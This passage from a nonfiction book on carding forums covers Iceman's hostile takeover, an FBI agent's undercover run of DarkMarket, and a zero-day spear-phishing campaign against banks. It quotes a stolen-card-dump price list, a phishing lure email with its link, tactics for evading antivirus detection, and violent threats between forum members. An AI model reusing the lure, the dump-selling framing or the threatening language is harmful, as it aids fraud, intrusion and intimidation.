boards. The +entire contents of the competing sites now lived in a new +section of Carders Market called “Historical posts from +merged forums.” They were unsorted and difficult to +navigate; Max had found the sites’ content worthy of +preserving but not of organizing. +Max watched the grumbling for a while, then stepped in +and let everyone know who was in charge. +@Master Splyntr: unless you have something +constructive or specific to say, your comment is +unwelcome. If you are unhappy with the layout, then go +away and come back later, because it is not yet sorted +out! +@matrix001: The old forums were negligent in their +security, using shared hosting, failing to use encryption +of the data, logging IP addresses, using “1234” as the +administrative passwords (yes really people this is +true!), and general administrative Nazism. Some, such +as TheVouched, were even giving a false sense of +security, which as you know is far worse than none at +all. +You ask, what is the meaning of “all this”? If you +mean, why would we merge five carding forums +together, the short answer is because I didn’t have +time nor interest to merge in the other four for a total of + +nine! +Basically, this was overdue. Why have five different +forums each with the same content, splitting users and +vendors, and a mish-mash of poor security and +sometimes poor administration and poor moderation. I +am not saying that is the case in all, but it was for most. +With the right moderation, CM will return to its +previous “tight” reign, with zero tolerance policy +against ripping, and almost anarchist policy of not +locking threads and promoting discussion. In the +meantime, there is extra “fluff” from the previous +forums, but that will be cleaned up. +What is the point? Security. Convenience. Increase +quality and decrease the noise. Bringing order to a +mess … +A Canadian hacker called Silo countered that Iceman +had dissolved the social glue that held the carder +community together. He’d violated their trust. +You breached our community’s security. Stole the +databases of other forums. Couldn’t your merger have +taken place with the admins of all the boards +consenting to it? What’s the difference between me +hacking your e-mails and reading up on your business +and posting your communications on my board? +Either way you look at it, you’ve breached what little +trust exists in the community. My suggestion is that you +delete the databases you have that aren’t yours to +display. The proper thing to do is ASK the admins of +the boards if one true unified board is in the best +interests of our community, and wait and see if they +would be interested in such a board. +That is my two cents. +There are people out here with a lot of skills Iceman. +How they use them is what determines our community. + +The Vouched came back online, but not for long—it was +supposed to be a private, secure forum open only to a +select few. When Max had broken its security, he’d +shattered its credibility, and nobody bothered to return. +TalkCash and ScandinavianCarding were doomed—they +had no backups of the databases Max had destroyed. +Their members mostly stayed on at Carders Market. +Aside from the Russian forums, which Max was having +trouble assimilating because of the language barrier, there +was just one black mark on Max’s triumph: DarkMarket. His +chief competitor had backups and managed to crawl back +to life within days. It was a slap in the face to everything +Max was trying to achieve for himself and the community. +The war had begun. +In Orange County, Chris was consolidating his end of the +business too. He decided it would be convenient to have +his full-time workers all living in the same place, and the +Archstone chain of apartment complexes offered an +Internet-based move-in process perfectly suited to his +plans. Prospective tenants could fill out a lease on the +company’s website and pay the easy $99 deposit and the +first month’s rent with a credit card. Chris could handle +everything online, and his people wouldn’t have to put in an +appearance until move-in day, when they’d stop by the +rental office to flash their fake ID and pick up the door key. +He moved two of his cashers, and Marcos, his pot +connection, into the Archstone Mission Viejo, a labyrinth of +McMansion-style apartments painted the colors of a sunset +and clinging to a hill dotted with palm trees and high- +tension lines alongside Interstate 5, ten minutes from his +house. He was also looking to expand his crew. One girl +had dropped out and moved to Toledo after her second in- +store bust, and two others had quit in disgust when Chris +impregnated his teenage girlfriend—he was now paying for +an apartment for the young woman and their son, whose +existence he kept secret even from his mother. + +At the NCFTA office in Pittsburgh, Keith Mularski, in his +Master Splyntr guise, got a private message from Iceman +himself two days after the hostile takeover. The hacker +wanted to apologize for some of his hasty words on his +forum. +Anticipating the next stage in the DarkMarket–Carders +Market conflict, Iceman had boasted that he would easily +defuse any DDoS attacks leveled against his site. But +afterward, he Googled Master Splyntr and learned he was +a world-class spammer with a botnet army. Iceman +seemed loath to turn a mere critic into a full-blown enemy. +Don’t take offense to my smartass comments. It is +true that if someone attacks me I will just track the +botnet and try to jack it or shut it down, but it’s not +something I want to taunt people with. No one needs to +waste their time with such activity, really DDoS is no +fun and so don’t get the wrong idea plz. :-) +Mularski was beginning to see an opportunity in the +upheaval gripping the underground. Nobody knew who to +trust anymore; everyone was angry at everyone else. If he +were to play both sides, he might make inroads against the +forum administrators as they grappled for allies in the +brewing battle. +He was allowed three substantive contacts. He decided +to use one of them to respond to Iceman. +No worries brotha, we’re kewl. I’m a smartass +myself. I got no interest in attacking. Shit, my bots +aren’t even configured to attack. Mailing makes me far +more money! I really got no interest in doing anything +that doesn’t make me money, unless I have a vendetta, +which I don’t. And if you do get attacked, I’m also pretty +good in tracking and hijacking, so hit me on ICQ +340572667 if ya need help.… :-) MS + +Mularski watched his screen, waiting. A few minutes +later, a response. +Excellent thank you :-) BTW, do you have any +suggestions for running things here, aside from the +obvious organizational mess? Also, I will change it so +you are a vendor and have user selectable title. (Done) +I don’t know if you vend mailing services with your net, +but that is a cool thing to have around and I’m sure +we’re better off having you available for hire. Also, if +you were a vendor before (or other?) then please +accept my apologies for the title loss. I preserved +some of the status like DM vendors, but messed up on +the other forums and those didn’t get preserved. Just +FYI. Thanks bro :-) Also added you to VIP group. +It was a promising response. Mularski talked things over +with his supervisor, then applied to headquarters for Group +II authority, the lesser of two tiers of undercover +engagement available to the FBI but still a step up from his +previous “passive observation only” mandate. The new +latitude wouldn’t let him participate in crimes, but he would +finally be permitted to actively engage with the +underground. He named Carders Market, and everyone +associated with running the site, as the investigation’s +targets. +The approval came quickly. But despite his encouraging +words, Iceman proved a slippery target; he kept Mularski at +arm’s length, not confiding in him and only chatting through +Carders Market’s internal messaging system. The FBI +agent had better luck on the other side of the battlefield. +He’d been an early member of DarkMarket, and now that +he was interactive, the site’s founder, JiLsi, quickly +identified Master Splyntr as management material. In early +September, Splyntr was appointed as a moderator on the +site. + +The war was heating up. Despite the lessons of the +August incursion, JiLsi couldn’t manage to completely lock +down DarkMarket. Iceman began sneaking in regularly and +deleting accounts at random, just to mess with JiLsi’s head. +When DarkMarket retaliated with a fierce DDoS attack +against Carders Market’s Iranian host, Iceman fired back +with a DDoS of his own against DarkMarket. Both sites +groaned under the weight of the junk packets. Iceman +quietly set up service at a U.S. hosting company with the +bandwidth to absorb the DDoS packets, cleaning the traffic +before channeling it back to his real server over an +encrypted VPN. +JiLsi was tearing his hair out, voicing his frustrations to +Master Splyntr. Mularski shifted his focus away from +Iceman and toward the British cybercrime boss who was +starting to treat him like a friend. Tentatively, he suggested +that JiLsi consider turning over DarkMarket to someone +seasoned in setting up bulletproof hosting. Someone +accustomed to running sites that everyone hates. A +spammer. +Hey, you know my background, he wrote in a chat. I’m +real good at setting up servers. I secure servers all the time. +I could set this up for you. +Mularski was toying with an extraordinary plan. In the +past, the Secret Service and FBI had both run admins as +informants: Albert Gonzalez on Shadowcrew and Dave +Thomas on the Grifters. But actually running a crime forum +directly would provide access to everything from the +carders’ IP addresses to their private communications, +while giving Master Splyntr, as the site’s runner, more +credibility in the underground than any agent could dream +of. +JiLsi expressed interest in Master Splyntr’s offer, and +Mularski braced himself for another trip to Washington, DC. + +26 + +What’s in Your Wallet? +Selling USA 100% APPROVED DUMPS +*NEW* Discounted Prices for approved dumps: +$11 MasterCard +$8 Visa Classic +$13 Visa Gold/Premium +$19 Visa Platinum +$24 Visa Signature +$24 Visa Business +$19 Visa Corporate +$24 Visa Purchasing +$19 American Express = new price drop (was 24) +$24 Discover = new price drop (was 29) +Minimum order 10 pieces. +Dumps sold by type of card. No bin list. +Max’s hostile takeover was about fixing the community, +not personal profit. But his business in stolen magstripe +data was stronger than ever after the merger—he was +earning a thousand dollars a day now selling dumps to +carders around the world, in addition to the five to ten +thousand a month he was still pulling in through his +partnership with Chris. +Publicly, at FTC meetings and elsewhere, the credit card +industry was doing its best to conceal the impact of the +rampant magstripe theft happening worldwide. Credit +leader Visa held up an industry-funded report by Javelin +Strategy and Research that claimed consumers, not +companies, were the source of the vast majority of identity +theft and credit card fraud cases: Some 63 percent of +cases originated with consumers, primarily victims of lost + +or stolen wallets, followed by theft by trusted associates, +stolen mail, and Dumpster diving. +The report was grossly misleading, only tallying cases in +which the victim knew how his information had been stolen. +Visa’s private numbers told the real story. Stolen wallets +hadn’t been the primary source of fraud since mid-2001, +when credit card theft from e-commerce sites sent +fraudulent “card not present” transactions—online and +telephone purchases—rocketing up the chart, while every +other category held steady. +In 2004, when stolen magstripe data became a massive +underground commodity, losses to counterfeit cards +followed the same stratospheric climb. In the first quarter of +2006, Chris Aragon–style counterfeiting edged out card- +not-present fraud for the first time, topping $125 million in +quarterly losses to Visa’s member banks alone. +Nearly all those losses began with a price list like Max’s. +As Digits, Max accumulated page after page of positive +reviews on Carders Market and a reputation for square +dealing. It was a point of pride with Max—and a sign of the +moral compartmentalization he’d practiced since +childhood. Max would happily hack a carder and copy his +entire hard drive, but if a customer paid him for information, +Max wouldn’t even consider shortchanging him. +His generosity, too, was well known. If Max had dumps +that were about to expire, he’d give them away for free +rather than let them go to waste. Together, his exemplary +business practices and the quality of his product made Max +one of the top five dumps vendors in the world, in a market +traditionally dominated by Eastern European sellers. +Max was cautious with his vending. By refusing to sell +dumps by BIN—bank identification number—he made it +tough for the feds to identify his breaches: The government +couldn’t just buy twenty dumps sourced to a single financial +institution and ask that bank to look for a common purchase +point in its transaction records. Instead, a batch of twenty +cards could belong to twenty different banks. They’d all + +cards could belong to twenty different banks. They’d all +have to cooperate with one another to nail down the source. +Additionally, only a few trusted associates knew that +Digits and Iceman were one and the same: mostly admins, +like Chris, a Canadian carder named NightFox, and a new +recruit called Th3C0rrupted0ne. +Of everyone he’d met in the scene, it was +Th3C0rrupted0ne with whom Max seemed to share the +most hacking history. As a teenager, C0rrupted had +discovered the warez scene on dial-up bulletin board +systems, then moved into recreational hacking under the +handles Acid Angel, -null-, and others. He defaced +websites for fun and joined a hacking gang called Ethical +Hackers Against Pedophiles—vigilante gray hats working +against Internet child pornography. +Like Max, he’d once thought of himself as one of the +good guys, before he became Th3C0rrupted0ne. +In other ways, they were very different. A product of a +hardscrabble childhood in a big-city housing project, +C0rrupted became a drug dealer at an early age and +picked up his first arrest—a gun charge—in 1996 when he +was eighteen years old. In college he began making fake +IDs for his friends, and his online research took him to +Fakeid.net, a Web bulletin board where experts like ncXVI +got their start. He graduated to small check and credit card +scams around the time Shadowcrew went down and then +found his way to the successor sites. +Diplomatic and even-tempered, C0rrupted was +universally liked in the scene and enjoyed moderator or +admin privileges on most of the forums. Max promoted him +to admin on Carders Market in the summer of 2005 and +made him unofficial site spokesman after the hostile +takeover. Max let C0rrupted in on his double identity about +a week after his power play. +So obviously I am Digits also. Might as well say it +straight since I blew cover in ICQ (talking about “our +forum,” etc.) + +It is a pain in the ass trying to keep that separate +from people I know and trust and like such as yourself. +So there you go … +Anyway, reasoning is, Iceman is legal. Digits is +breaking the law. I assumed if I could keep it separate +there would be no legal leg to stand on for coming after +“me” as the forum admin. +Chris remained the greatest threat to Max’s security. +Every time they fought now, Max was reminded of how +vulnerable he was to the only carder privy to his real-life +identity. “I can’t believe how much you know about me,” +he’d spit out, angry at himself. +Meanwhile, Chris had been trying to drive Max into +pulling one big score, something that would catapult them +both out of the crime business for good and maybe fund a +new legitimate start-up for Chris in Orange County. He’d +crafted a flowchart and a step-by-step plan for each of them +to follow; he called it the “Whiz List.” +Max was supposed to infiltrate banking networks and +gain the power to direct millions of dollars to accounts +specified by Chris. He’d delivered on his end—from the +very start of their partnership, back when he was working +from Chris’s garage, he’d been breaching small banks and +savings and loans. He was in hundreds of them now and +could transfer money out of customers’ accounts at will. But +the scheme was hung up on Chris’s end. Chris had to find a +safe harbor for the money Max would steal—an offshore +repository where they could park the cash without it being +recalled by the victim bank. So far, he’d failed. +So when, in September, Max got his hands on a deadly +new Internet Explorer zero day, he shared the news not with +Chris but with a different partner, one who had more +knowledge of international finance, the Carders Market +admin called NightFox. +The security hole was a monster: another buffer overflow, +this time in the Internet Explorer code designed to let + +websites draw vector graphics on a visitor’s screen. Sadly +for Max, Eastern European hackers had found the bug first, +and they’d been using it. A computer security company had +already found the Russian exploit code infecting visitors to +an Internet porn site and sent it to Microsoft. The +Department of Homeland Security had issued a blunt +warning to Internet Explorer users: “Do not follow +unsolicited links.” +The word was out, but there was no patch. Every Internet +Explorer user was vulnerable. Max got his copy of the +Russian exploit in the early morning hours of September 26 +and informed NightFox enthusiastically. +“Assume we get a free pass today to own whatever +company we want,” Max wrote over Carders Market’s +messaging system. “There you go. No limits. Visa.com. +Mastercard.com. egold.com. Whatever you can get the +employee e-mails for. Google. Microsoft. Doesn’t matter. +It’s all equally ownable right now.” +Microsoft pushed out a patch later that day, but Max +knew that even the most secure company would take days +or weeks to test and install the update. The Russian exploit +was already detected by antivirus software, so he modified +it to change its signature, running it through his antivirus lab +to verify that it was now undetectable. +The only thing left was the social engineering: Max had to +trick his targets into visiting a website loaded with the +exploit code. Max decided on the domain name +Financialedgenews.com, and set up hosting at ValueWeb. +NightFox came back with the target list: CitiMortage, +GMAC, Experian’s Lowermybills.com, Bank of America, +Western Union MoneyGram, Lending Tree, and Capital +One Financial, one of the largest credit card issuers in the +country. NightFox had vast databases of internal corporate +e-mail addresses he’d acquired from a “competitive +intelligence” firm, and he sent Max thousands of them, +spread across all the targets. + +On September 29, Max fired up his spamming software +and flung a personalized e-mail at his victims. The +message was from “Gordon Reily,” with the return address +g.reily@lendingnewsgroup.com. +I am a reporter for Lending News doing a follow up +story on the recent leak of customer records from +Capital One. I saw the name Mary Rheingold in the +article from Financial Edge and would like to interview +you for a follow up piece. +http://financialedgenews.com/news/09/29/Disclosure_Capital0ne +If you have time I would greatly appreciate an +opportunity to further discuss the details of the above +article. +Each copy of the message was customized, so every +employee would think he or she was mentioned by name in +the notional Financial Edge article. At Capital One, 500 +employees got the message, from executives to PR +spokespeople and IT workers. About 125 of them clicked +on the poisoned link and were sent to a page loaded with +generic finance industry news. While they puzzled over the +page, a hidden payload zipped through the corporate +firewall and onto their machines. +The software opened a back door that would allow Max +to slip in at his leisure and scour the victims’ hard drives for +sensitive data, sniff the banks’ internal networks, steal +passwords. It wasn’t much different from what he’d done to +thousands of Defense Department computers a lifetime +ago. Back when it was all just fun and games. + +27 + +Web War One +eith Mularski stood at the podium, his PowerPoint +presentation filling an LCD big-screen at his back. In front +of him were fifteen senior FBI officials and Justice +Department lawyers, sitting around the conference room +table at Justice headquarters. They were riveted. Mularski +was proposing something that had never been done +before. +Group I “sensitive circumstances” authorizations were a +rare thing in the bureau. Mularski first wrote out a twenty- +page proposal, addressing every aspect of the plan and +gathering legal opinions from FBI lawyers for each. The +FBI’s general counsel was excited about the possibilities; if +it were approved, the operation could set a precedent for +future online undercover work. +The biggest obstacle for the Justice Department’s +Undercover Review Committee was the third-party liability +issue of letting crimes unfold over a website owned and +operated by the U.S. government. How would Mularski +mitigate the damage so innocent people and institutions +wouldn’t suffer? Mularski had an answer at the ready. The +criminal activity on DarkMarket was going to take place +whether the FBI ran the forum or not. But with the bureau +controlling the server, and Master Splyntr leading the site, +the FBI could potentially intercept large amounts of stolen +data that would otherwise flow freely through the black +market. His proposal stipulated that any financial data +would be sent immediately to the affected banks. Stolen +credit cards could be canceled before they were used. +The meeting lasted twenty minutes. When he returned to + +Pittsburgh on October 7, Mularski had written approval to +acquire DarkMarket. Iceman was still listed as a subject of +the undercover operation, but now JiLsi and DarkMarket’s +other leaders were the primary targets. +Once his wife went to bed, Mularski settled in front of his +couch, turned on Saturday Night Live, and looked for JiLsi +on ICQ. After some pleasantries, he got down to business. +DarkMarket was under yet another DDoS attack, and +Mularski, as Master Splyntr, was ready to take the site onto +a secure server—JiLsi need only say the word, and his +problems with Iceman would be history. +JiLsi had some reservations. DarkMarket was his baby, +and he didn’t want to be perceived by the community as +ceding control. That wouldn’t be a problem, Mularski +explained. Master Splyntr would be a stealth administrator. +Nobody but he and JiLsi would know he was running the +site. To everyone else, he’d still just be a moderator. +“Bro,” JiLsi typed back. “Get your server ready. We +moving.” +Mularski went to work at once. He rented a server from a +Texas-based hosting company called the Planet and went +to the underground to shore it up, buying $500-a-month +DDoS protection services from a Russian named +Quazatron and paying for it in e-gold. Quazatron configured +the site so its public face was at Staminus, a DDoS- +resistant high-bandwidth hosting company. The company’s +pipes could withstand a deluge, and Quazatron’s software +would channel only the legitimate traffic to DarkMarket’s +real server behind the scenes. +Everything would be done the way an Eastern European +cybercrook would do it. When Mularski wanted to log in to +the site’s back end, he’d go through KIRE, a Virginia +company offering Linux “shell accounts”—a service that lets +IRC users connect to chat rooms without being traced to +their home IP addresses. Nobody would see that the Polish +spam king was logging in from Pittsburgh. + +Once the move was complete, Mularski went to court and +won a sealed search warrant against his own server, +allowing him to riffle through DarkMarket’s user database, +access logs, and private messages. +There was one more thing to do. Post-Shadowcrew, it +was de rigueur for carder forums to make users click on a +terms-of-service agreement prohibiting illegal content and +stipulating that the site’s operators weren’t responsible for +anything on the board. Forum runners believed the +legalistic language might shield them from prosecution. +DarkMarket had a particularly long and detailed user +agreement, so nobody noticed when Master Splyntr added +a line. +“By your use of this forum you agree that the +administrators may review any communication sent using +this forum to ensure compliance with this policy,” he wrote, +“or for any other purpose.” +“I think it’s important to note that Iceman is a foolish +wannabe hacker who goes around and hacks sites for fun +and pleasure.” +El Mariachi knew how to push Iceman’s buttons. After the +hostile takeover, Dave Thomas returned to the Life on the +Road blog to browbeat his foe relentlessly, calling him +“Iceboy,” “Officer Ice,” and “a fucking piece of shit on my +shoes.” He challenged Iceman to meet him in person, so +they could resolve their dispute like men. And he implied he +could hire a hit man to track down the carding kingpin and +end his life. +Max responded with growing fury. He hadn’t forgotten the +hassle and expense of finding a new host after Thomas +shut him down in Florida. The aggressiveness he’d kept +buried since Boise boiled from his gut and into his +fingertips. “You small dick limp sack of shit. I could fucking +tear you apart with my bare hands but a COWARD snitch +like yourself would call the cops and scramble for a weapon + +at the first sight of me,” he wrote. “You better pray to your +god that I am never outed, because not only will you look +like even more of a jackass than you already do, but then I +will have no inhibition about coming over and wringing your +snitch punk neck.” +When he calmed down, he sent Thomas a private e-mail. +He’d been thinking about taking down Carders Market and +retiring his Iceman identity. It wouldn’t be a surrender; +rather, it was the most serious threat imaginable to +Thomas’s campaign. +You haven’t read the Art of War, have you, cunt? +You know NOTHING about me. I know EVERYTHING +about you. +I kill CM, I kill Iceman, then what do you have you +punk bitch? Shadowboxing?? You are FUCKED. An +enemy who will fuck you over constantly for years, that +you have NO DEFENSE and NO TARGET for +retribution. +I am your worst nightmare you little bitch, and you +and your family will be feeling the effects of the money +you cost me for a long, long time. +Two days later, Max proved he was serious. He hacked +into El Mariachi’s website, the Grifters, which Thomas had +turned into a semi-legitimate security site dedicated to +watching the carding forums. Max wiped the hard drive. The +site never came back. +Iceman announced his triumph in a final public message +to the blog. “I have nothing to prove, and now having beat +down David Renshaw Thomas, federal snitch, I make my +exit,” he wrote. “Unlike you people, I pay attention to my own +business. Learn a lesson. Move on and leave me the fuck +alone.” +But Max wasn’t going to be able to slip back into the +shadows. Two reporters from USA Today had taken notice +of the public carder war and confirmed the details of the + +hostile takeover with security firms watching the forums. +The morning after Max declared victory over El Mariachi, +delivery drivers around the country plunked down +Thursday’s edition of the paper on more than two million +doorsteps from coast to coast. There, on the front page of +the business section, was the whole sordid tale of Iceman’s +annexation of the carding sites. +By letting his ego lead him into a public battle with David +Thomas, Max had gotten Iceman into the largest-circulation +daily in America. +“The Secret Service and FBI declined to comment on +Iceman or the takeovers,” the article read. “Even so, the +activities of this mystery figure illustrate the rising threat that +cybercrime’s relentless expansion—enabled in large part +by the existence of forums—poses for us all.” +The story wasn’t a surprise; the reporters had +approached Iceman for comment, and Max had e-mailed a +long one, lobbing his Craigslist defense. His views didn’t +make it into the article, and the story only made Max more +defiant. He added a quote from the piece to the top of the +Carders Market login page: “It’s like he created the Wal- +Mart of the underground.” +Max showed the article to Charity. “I seem to have +created quite a stir.” +Chris was apoplectic when he learned that Max had +corresponded with the journalists. He’d watched as Max +burned hours squabbling with Thomas. Now his partner +was giving press interviews? +“You’ve lost your fucking mind,” he said. +Max was swamped. Vouch requests were pouring into +Carders Market in a torrent. The USA Today article +seemed to bring out every street-level hood hoping to +break into computer fraud. The site picked up over three +hundred new members overnight. Two weeks later, they +were still coming in. + +He offloaded as much of the work as he could to his +admins. Max had other things to worry about now. His +spear-phishing attack against the financial institutions had +been wildly successful, but getting past the banks’ firewalls +had turned out to be the easy part. Bank of America and +Capital One, in particular, were huge institutions, and Max +was lost in their vast networks. He could easily spend years +on either one, just looking for the data and the access he +needed to make a big score. Max was having trouble +staying motivated for the mind-numbing follow-through to +his intrusions; cracking the networks had been the fun part, +and now that was over. +Instead, Max put the banks on the back burner to focus +on the carding war. Max’s new hosting provider was getting +complaints about the rampant criminality on Carders +Market. Max saw one of the e-mails, sent from an +anonymous webmail account. On a hunch, Max tried +logging in to the account with JiLsi’s password. It worked. +JiLsi was trying to get him shut down. +Max retaliated by hacking into JiLsi’s account on the +Russian forum Mazafaka and posting an avalanche of +messages reading, simply, “I’m a fed.” Then he went public +with the evidence of JiLsi’s malfeasance; snitching to +Carders Market’s hosting company was a scummy tactic. +DarkMarket just didn’t have the decency to die. Max +could have dropped the database again, but it would do no +good—the site had come back before. His DDoS attacks +had become ineffective, too. Overnight, DarkMarket had +come into expensive high-bandwidth hosting and erected +dedicated e-mail and database servers. It was suddenly a +hard target. +Then Max heard an intriguing rumor about DarkMarket. +The story involved Silo, a Canadian hacker known for an +uncanny ability to juggle dozens of false handles in the +community, effortlessly switching writing styles and +personalities for each one. Silo’s second claim to fame +was his compulsive back-dooring of other carders. He was + +was his compulsive back-dooring of other carders. He was +constantly posting software with hidden code that would let +him spy on his peers. +Both traits were at play when Silo registered an account +at DarkMarket under a new handle and submitted a piece +of hacking software for vendor review. True to form, Silo +had secreted a hidden function in the software that would +smuggle a user’s files out to one of Silo’s servers. +When Silo looked at the results, he found a small cache +of blank Microsoft Word templates, including a “malware +report” form. The templates carried the logo for an +organization called the National Cyber Forensics and +Training Alliance in Pittsburgh. Max looked them up; it was +a fed shop. Someone connected with DarkMarket was +working for the government. +Determined to investigate, Max breached DarkMarket +again through his back door. This time, it was a +reconnaissance mission. He dropped into a root shell and +entered a command to bring up the recent login history and +then started down the list in another window, checking the +public registration records for each of the Internet IP +addresses used by the administrators. When he got to +Master Splyntr, he stopped. The supposedly Polish +spammer had connected from an IP address belonging to +a private corporation in the United States called +Pembrooke Associates. +He pulled up the Whois.net registration records for the +company’s website, Pembetal.com. The mailing address +listed was a PO box in Warrendale, Pennsylvania, twenty +miles north of Pittsburgh. There was also a phone number. +Another click of his mouse, another browser window— +the reverse white pages at Anywho.com. He entered the +phone number and this time got a real street address: 2000 +Technology Drive, Pittsburgh, Pennsylvania. +It was the address he’d already found for the National +Cyber Forensics and Training Alliance. Master Splyntr was +a fed. + +28 + +Carder Court +eith Mularski was screwed. +He got the word first from an agent at the Secret Service +field office across town. “I think you may be in some +trouble.” One of their myriad informants heard that Iceman +had uncovered incontrovertible proof that Master Splyntr +was either a snitch, a corporate security spy, or a federal +agent. Iceman had forged a temporary alliance with his +sometime enemy Silo and was preparing a comprehensive +presentation for the leadership of Carders Market and +DarkMarket. Iceman and Silo were going to put Master +Splyntr on trial. +It had begun with Silo’s code. Master Splyntr’s reputation +as a spammer and programmer made him DarkMarket’s +go-to guy for malware reviews. It was one of the perks of +his undercover operation: Mularski got the first look at the +underground’s latest attack code and could pass it to +CERT, who would in turn give it to all the antivirus +companies. The malicious code would be detectable even +before it went on the black market. +This time, Mularski had assigned the code as a training +exercise to one of the CMU students interning at NCFTA. +As standard procedure, the student ran the program +isolated in a virtual machine—a kind of software petri dish +that could be scrubbed afterward. But he forgot that he had +a thumb drive in the USB port. The drive was loaded with +blank malware report forms containing the NCFTA logo +and mission statement. Before the intern realized what was +happening, the documents were in Silo’s hands. +Six DarkMarket admins and moderators had gotten a + +copy of Silo’s code. Now the Canadian knew that one of +them was a fed. +Silo was a wild card. In real life, he was Lloyd Liske, a +Vancouver auto shop manager and credit card forger +who’d been busted a few months after Operation Firewall. +When he was sentenced to eighteen months of house +arrest, Liske changed his surname from Buckell and his +handle from Canucka, and reemerged in the carding +scene. +Now the Canadian was untouchable. It was widely known +in law enforcement circles that Silo was an informant for the +Vancouver Police Department. That’s why he was always +back-dooring other hackers: The Trojan horse that +infiltrated NCFTA wouldn’t have been intended to expose a +law enforcement operation; it was just Silo trying to gather +intelligence on DarkMarket members for the police. +Silo had no allegiance to the FBI, but he probably +wouldn’t have gone out of his way to expose a bureau +undercover operation. Unfortunately, Iceman had learned +about the discovery and staged his reconnaissance raid on +DarkMarket. That’s where Mularski’s own personal +screwup came into play. He normally logged in to +DarkMarket through his KIRE shell, hiding his location. But +JiLsi was a demanding boss, constantly hitting Master +Splyntr with maintenance tasks—like swapping in a new +banner ad—that simply had to be performed at once. +Sometimes KIRE was down when Mularski got one of +these requests, and he’d take a shortcut and log in directly. +Iceman had caught him. +Even then, he should have been relatively safe. The office +broadband service was set up under the name of a dummy +corporation, with a phone number that rang to an +unanswered VoIP line in the communications room. The +phone line was supposed to be unlisted. Somehow, though, +it wasn’t, and Iceman had gotten the address and +recognized it as the NCFTA’s. +Mularski walked hurriedly to the communications room, + +Mularski walked hurriedly to the communications room, +swiped his access card, keyed in the door code, and +locked himself inside. He picked up the secure line to +Washington. The FBI agent didn’t sugarcoat his report to +the brass. After all his work winning undercover authority to +take over DarkMarket, getting a buy-in from senior Justice +Department and bureau officials, Iceman was going to blow +them out of the water just three weeks into the operation. +Max struggled with how to handle the exposé—after his +attacks on DarkMarket, he knew his findings would be +viewed as partisan mudslinging. He considered shuttering +Carders Market before exposing Master Splyntr, to avoid +the perception that the whole thing was just another volley in +the carding wars. Instead, he decided to send his new +lieutenant, Th3C0rrupted0ne, to represent his site. +The trial was held over Silo’s “Carder IM”—a free, +supposedly encrypted instant messaging program the +Canadian hacker offered as an alternative to AIM and ICQ, +supported by display ads for dumps vendors. Matrix001 +showed up from the DarkMarket side—JiLsi was busy with +the fallout from Max’s attack on Mazafaka. Silo and two +other Canadian carders were also present. Silo opened the +meeting by handing out a compressed RAR file containing +the evidence gathered by him and Iceman. +When some of the carders opened the file, their antivirus +software went wild. Silo had back-doored the evidence; not +a promising start to a summit meeting. +C0rrupted and Silo walked them through the case: Silo’s +document templates showed that someone at NCFTA held +a privileged position on DarkMarket, and the access logs +Iceman had stolen proved that Master Splyntr was the mole. +“One hundred percent undeniable proof,” wrote +C0rrupted. “We worked hard to try and make peace, and if +we go public LE [law enforcement] is going to come after +us HARD. But if we don’t say anything, we are responsible +for all those who get fucked over.” + +“This is for real dude,” said Silo. +Matrix was unconvinced. He ran his own Whois on the +Pembrooke Associates domain name and got back an +anonymous listing through Domains by Proxy: no street +address, no phone number. “Blah,” Matrix typed. “You did +not even verify the whois info and the company, did you? +Who passed you that stuff?” +“That’s not my stuff,” wrote Silo. “That’s Iceman.” +“So you believe every shit which is pasted to you? +Without even verifying it?” +Silo’s evidence was no more convincing to Matrix: The +NCFTA templates contained spelling and formatting errors +—would the FBI, or a nonprofit security group, really do +such shoddy work? Moreover, Iceman’s contempt for +DarkMarket was well-known, and Silo was a constant +annoyance on the board. +The conversation grew heated. C0rrupted dropped out, +and the others fell silent while Silo and Matrix began +exchanging insults. “What in the whole world should make +me trust you?” asked Matrix. +“Don’t,” Silo finally said. “Don’t trust me. Get the fuck off +my IM … Go get busted.” +Mularski was excluded from the meeting, but when it +concluded, Matrix sent Master Spyntr a transcript. The +agent was pleased to see his last-minute cleanup had +worked: As soon as he’d learned about Iceman’s plans to +expose him, he’d contacted the domain registrar and got +the company to scrub the Pembrooke Associates name +and phone number from the records. Then he asked +Anywho to take out its listing for the undercover phone line. +The cover-up was sure to convince Iceman all the more that +Master Splyntr was a fed, but nobody else was able to +independently verify his findings. +Now Mularski went into spin control over ICQ. He told +Matrix and anyone else who’d listen that he was innocent. +He directed the carders’ attention to the logs, highlighting +all the occasions he’d logged in from KIRE’s IP address. + +all the occasions he’d logged in from KIRE’s IP address. +Those are my logins, he wrote. I don’t know who those other +logins are. +Then he spun and attacked. The doubt Iceman had sown +about JiLsi worked to his advantage. Things were going +crazy, he wrote. JiLsi had been acting suspiciously. For +one thing, he’d instructed Master Splyntr not to tell anyone +that he was running the server. And while JiLsi cultivated +the impression that DarkMarket was hosted in a country out +of reach of western law enforcement, he was actually +hosting it in Tampa, Florida, where the feds could just waltz +in any time and serve a search warrant. It was odd behavior +indeed. +JiLsi protested his innocence, but it was looking bad for +him. Master Splyntr publicly thanked Iceman for bringing the +matter to his attention and said he’d move DarkMarket out +of the United States at once. +Mularski reached out to law enforcement contacts in +Ukraine, and they helped him quickly get hosting there. In +the blink of an eye, DarkMarket was in Eastern Europe. +Most of the carders had to agree that no fed would move a +sting site to a former Soviet state. +There was no formal verdict, but a consensus formed that +Master Splyntr was innocent. They weren’t too sure about +JiLsi. +When the controversy subsided, Mularski returned to the +routine business of running his undercover operation. He +was at his desk filling out reports a couple of weeks later +when he got a call from another agent. +Special Agent Michael Schuler was a legend among the +bureau’s cybercrime agents. It was he who’d hacked into +the Russians’ computers in the Invita sting. Now stationed +in the Richmond, Virginia, field office, Schuler was calling +about a breach at nearby Capital One. The bank’s security +officials had detected an attack using an Internet Explorer +exploit. They’d sent Schuler a copy of the code, and he + +wanted Mularski to get one of the NCFTA’s geeks to take a +look at it. +Mularski listened as Schuler described his investigation +to date. He’d focused on the fake news website, +Financialedgenews.com, used to deliver the malware. The +domain was registered to a false identity in Georgia. But +when the registrar, Go Daddy, checked its records, it found +the same user had once registered another address +through the company. +Cardersmarket.com. +Mularski recognized the significance at once. Iceman +positioned himself as the innocent operator of a website +that happened to discuss illegal activity. Now Schuler had +evidence that he was also a profit-oriented hacker, one +who’d broken into the network of the fifth-largest credit card +issuer in America. “Dude, you got the case!” Mularski +laughed. “You got the case right now on the guy we were +just trying to target on our Group II. We’ve got to work +together on this.” +Across town, Secret Service agents at the Pittsburgh +field office had made a discovery of their own about +Iceman: An informant tipped them off that Carders Market’s +kingpin had a second identity as the dumps vendor 